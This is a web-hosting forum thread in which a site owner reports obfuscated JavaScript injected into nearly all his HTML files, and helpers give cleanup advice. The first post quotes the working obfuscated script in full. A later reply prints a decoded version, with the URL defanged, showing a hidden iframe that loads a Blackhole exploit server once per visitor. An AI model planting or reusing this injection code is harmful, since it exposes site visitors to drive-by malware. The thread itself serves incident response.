My account seems to have been hacked!

Status
Not open for further replies.

odam2x10

New Member
Messages
6
Reaction score
0
Points
1
Nearly all my html files have acquired a bit of javascript code as of May 25 2013 at 12:23AM. They were all changed at the same time, so it must have been done by a robot.

I haven't yet worked out what the code does, but I'll put it at the bottom of this message in case anyone recognises it and can tell me its purpose.

I've changed my password in case that's how someone got in.

Has anyone seen such things before? What can I do to stop it happening again - apart from the new password?

Thanks

Ken

<!--0c0896--><script type="text/javascript" language="javascript" > sp="split";w=window;aq="0"+"x";ff=String;z="y";ff=ff.fromCharCode;try{document["\x62od"+z]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5a,70,58,63,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,5a,70,58,63,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,5b,5c,65,6b,5a,66,69,67,25,5a,66,25,6c,62,26,6a,5c,69,6d,26,5c,6a,5b,25,67,5f,67,1e,32,4,1,17,5a,70,58,63,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,17,34,17,1e,58,59,6a,66,63,6c,6b,5c,1e,32,4,1,17,5a,70,58,63,25,6a,6b,70,63,5c,25,59,66,69,5b,5c,69,17,34,17,1e,27,1e,32,4,1,17,5a,70,58,63,25,6a,6b,70,63,5c,25,5f,5c,60,5e,5f,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,5a,70,58,63,25,6a,6b,70,63,5c,25,6e,60,5b,6b,5f,17,34,17,1e,28,67,6f,1e,32,4,1,17,5a,70,58,63,25,6a,6b,70,63,5c,25,63,5c,5d,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,5a,70,58,63,25,6a,6b,70,63,5c,25,6b,66,67,17,34,17,1e,28,67,6f,1e,32,4,1,4,1,17,60,5d,17,1f,18,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,5a,70,58,63,1e,20,20,17,72,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,1e,33,5b,60,6d,17,60,5b,34,53,1e,5a,70,58,63,53,1e,35,33,26,5b,60,6d,35,1e,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,5a,70,58,63,1e,20,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5a,70,58,63,20,32,4,1,17,74,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,4a,5c,6b,3a,66,66,62,60,5c,1f,5a,66,66,62,60,5c,45,58,64,5c,23,5a,66,66,62,60,5c,4d,58,63,6c,5c,23,65,3b,58,70,6a,23,67,58,6b,5f,20,17,72,4,1,17,6d,58,69,17,6b,66,5b,58,70,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,6d,58,69,17,5c,6f,67,60,69,5c,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,60,5d,17,1f,65,3b,58,70,6a,34,34,65,6c,63,63,17,73,73,17,65,3b,58,70,6a,34,34,27,20,17,65,3b,58,70,6a,34,28,32,4,1,17,5c,6f,67,60,69,5c,25,6a,5c,6b,4b,60,64,5c,1f,6b,66,5b,58,70,25,5e,5c,6b,4b,60,64,5c,1f,20,17,22,17,2a,2d,27,27,27,27,27,21,29,2b,21,65,3b,58,70,6a,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,17,34,17,5a,66,66,62,60,5c,45,58,64,5c,22,19,34,19,22,5c,6a,5a,58,67,5c,1f,5a,66,66,62,60,5c,4d,58,63,6c,5c,20,4,1,17,22,17,19,32,5c,6f,67,60,69,5c,6a,34,19,17,22,17,5c,6f,67,60,69,5c,25,6b,66,3e,44,4b,4a,6b,69,60,65,5e,1f,20,17,22,17,1f,1f,67,58,6b,5f,20,17,36,17,19,32,17,67,58,6b,5f,34,19,17,22,17,67,58,6b,5f,17,31,17,19,19,20,32,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,3e,5c,6b,3a,66,66,62,60,5c,1f,17,65,58,64,5c,17,20,17,72,4,1,17,6d,58,69,17,6a,6b,58,69,6b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,65,58,64,5c,17,22,17,19,34,19,17,20,32,4,1,17,6d,58,69,17,63,5c,65,17,34,17,6a,6b,58,69,6b,17,22,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,22,17,28,32,4,1,17,60,5d,17,1f,17,1f,17,18,6a,6b,58,69,6b,17,20,17,1d,1d,4,1,17,1f,17,65,58,64,5c,17,18,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,27,23,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,20,17,20,17,20,4,1,17,72,4,1,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,74,4,1,17,60,5d,17,1f,17,6a,6b,58,69,6b,17,34,34,17,24,28,17,20,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,6d,58,69,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,19,32,19,23,17,63,5c,65,17,20,32,4,1,17,60,5d,17,1f,17,5c,65,5b,17,34,34,17,24,28,17,20,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,63,5c,65,5e,6b,5f,32,4,1,17,69,5c,6b,6c,69,65,17,6c,65,5c,6a,5a,58,67,5c,1f,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,63,5c,65,23,17,5c,65,5b,17,20,17,20,32,4,1,74,4,1,60,5d,17,1f,65,58,6d,60,5e,58,6b,66,69,25,5a,66,66,62,60,5c,3c,65,58,59,63,5c,5b,20,4,1,72,4,1,60,5d,1f,3e,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,20,34,34,2c,2c,20,72,74,5c,63,6a,5c,72,4a,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1"[sp](",");}w=f;s=[];for(i=2-2;-i+1332!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(e(aq+(w[j]))+9);}za=e;za(s)}</script><!--/0c0896-->
 

Livewire

Abuse Compliance Officer
Staff member
Messages
18,169
Reaction score
216
Points
63
I'm not exactly sure of its purpose exactly, but it's definitely going to be malicious in any case - there's no reason for it to be obfuscated the way it is. I would recommend updating passwords, and if you're using any scripts that have php files, make sure they're up-to-date - this type of hack doesn't always require the login password if there's an exploitable php script on the account.

I did login to your account and take a quick peek; I didn't see anything that would have allowed this to go up, but I'll admit I'm no expert on this either. With the number of available scripting exploits, it's virtually impossible to test/check for them all.
 

descalzo

Grim Squeaker
Community Support
Messages
9,373
Reaction score
326
Points
83
Check your cPanel filesystem for files you do not recognize, especially ones with .php extensions.

Make sure any FTP client you use is legit and not hacked/nulled/free-when-it-really-costs-alot. The same for any software you use to build your site.
 

odam2x10

New Member
Messages
6
Reaction score
0
Points
1
[h=3]Microsoft Security Essentials complained when I tried to debug the javascript in my files - see below.

How it all got there, I don't know.
I use the cPanel to up/down load files - no FTP programs involved.
I don't have any PHP files.
None of my perl files had been touched.
Look as as if I'll have to go through loads of files and upload replacements from backups.

Thanks for your help

Ken

Summary[/h]Microsoft security software detects and removes this threat.
Trojan:JS/BlacoleRef.CZ is a detection name for an obfuscated JavaScript, often found inserted into compromised websites. This threat is designed to load a hidden IFrame that loads behind the user's browser, redirecting it to an exploit server known as "Blackhole".
 

hbazer

Member
Messages
398
Reaction score
7
Points
18
Can I post the decoding of the hex (array) - as posted by the OP - in this thread ?
 

Corey

I Break Things
Staff member
Messages
34,553
Reaction score
204
Points
63
Can I post the decoding of the hex (array) - as posted by the OP - in this thread ?


Sure, just remove anything specifically malicious from it or that would allow someone to easily copy\paste it somewhere else for use.
 

hbazer

Member
Messages
398
Reaction score
7
Points
18
Sure, just remove anything specifically malicious from it or that would allow someone to easily copy\paste it somewhere else for use.

Here is the decoding of those hex numbers (array) in the code the OP found added to his file(s) and posted above
- the information needed to decode it - is in the same block of code - and that code is part of the hack

Code:
function zzzfff()
 {
  var cyal = document.createElement('iframe');

*** I have changed the format of this URL - so you can not click and go with it ***
*** This is the URL to the 'blackhole' ***
  cyal.src = 'http|\\dentcorp#co#uk\serv\esd#php';

  cyal.style.position = 'absolute';
  cyal.style.border = '0';
  cyal.style.height = '1px';
  cyal.style.width = '1px';
  cyal.style.left = '1px';
  cyal.style.top = '1px';

  if (!document.getElementById('cyal'))
  {
    document.write('<div id=\'cyal\'></div>');
    document.getElementById('cyal').appendChild(cyal);
  }
}

function SetCookie(cookieName,cookieValue,nDays,path)
  {
    var today = new Date();
    var expire = new Date();
    if (nDays==null || nDays==0) nDays=1;
    expire.setTime(today.getTime() + 3600000*24*nDays);
    document.cookie = cookieName+"="+escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? ";
    path=" + path : "");
  }

function GetCookie( name )
  {
    var start = document.cookie.indexOf( name + "=" );
    var len = start + name.length + 1;

    if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) )
      {
        return null;
      }

      if ( start == -1 ) return null;

    var end = document.cookie.indexOf( ";", len );

    if ( end == -1 ) end = document.cookie.length;

    return unescape( document.cookie.substring( len, end ) );
  }

if (navigator.cookieEnabled)
  {
    if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');

zzzfff();
} }
 
Status
Not open for further replies.
Top